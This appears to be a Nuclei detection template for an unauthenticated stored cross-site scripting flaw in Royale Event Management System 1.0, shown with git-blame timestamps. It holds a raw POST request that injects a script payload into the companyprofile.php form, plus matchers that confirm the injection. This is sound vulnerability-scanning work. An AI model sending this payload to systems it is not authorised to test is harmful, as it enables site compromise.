2022-06-23 18:45:44 +00:00
|
|
|
id: royalevent-stored-xss
|
2022-06-23 07:30:43 +00:00
|
|
|
|
|
|
|
info:
|
2022-09-09 17:34:37 +00:00
|
|
|
name: Royale Event - Stored Cross-Site Scripting
|
2022-06-23 07:30:43 +00:00
|
|
|
author: ritikchaddha
|
|
|
|
severity: high
|
|
|
|
description: |
|
|
|
|
Detects an XSS vulnerability in Royal Event System
|
|
|
|
reference:
|
|
|
|
- https://packetstormsecurity.com/files/166479/Royale-Event-Management-System-1.0-Cross-Site-Scripting.html
|
|
|
|
- https://www.sourcecodester.com/sites/default/files/download/oretnom23/Royal%20Event.zip
|
2022-06-23 18:40:24 +00:00
|
|
|
metadata:
|
|
|
|
verified: true
|
2022-08-27 04:41:18 +00:00
|
|
|
tags: xss,unauthenticated,cms,royalevent,packetstorm
|
2022-06-23 07:30:43 +00:00
|
|
|
|
|
|
|
requests:
|
|
|
|
- raw:
|
|
|
|
- |
|
|
|
|
POST /royal_event/companyprofile.php HTTP/1.1
|
|
|
|
Host: {{Hostname}}
|
|
|
|
|
|
|
|
companyname=%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E®no=test&companyaddress=&companyemail=&country=India&mobilenumber=1234567899&submit=
|
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: word
|
|
|
|
words:
|
2022-06-23 18:40:24 +00:00
|
|
|
- 'value="><script>alert(document.domain)</script>" >'
|
2022-06-23 07:30:43 +00:00
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 302
|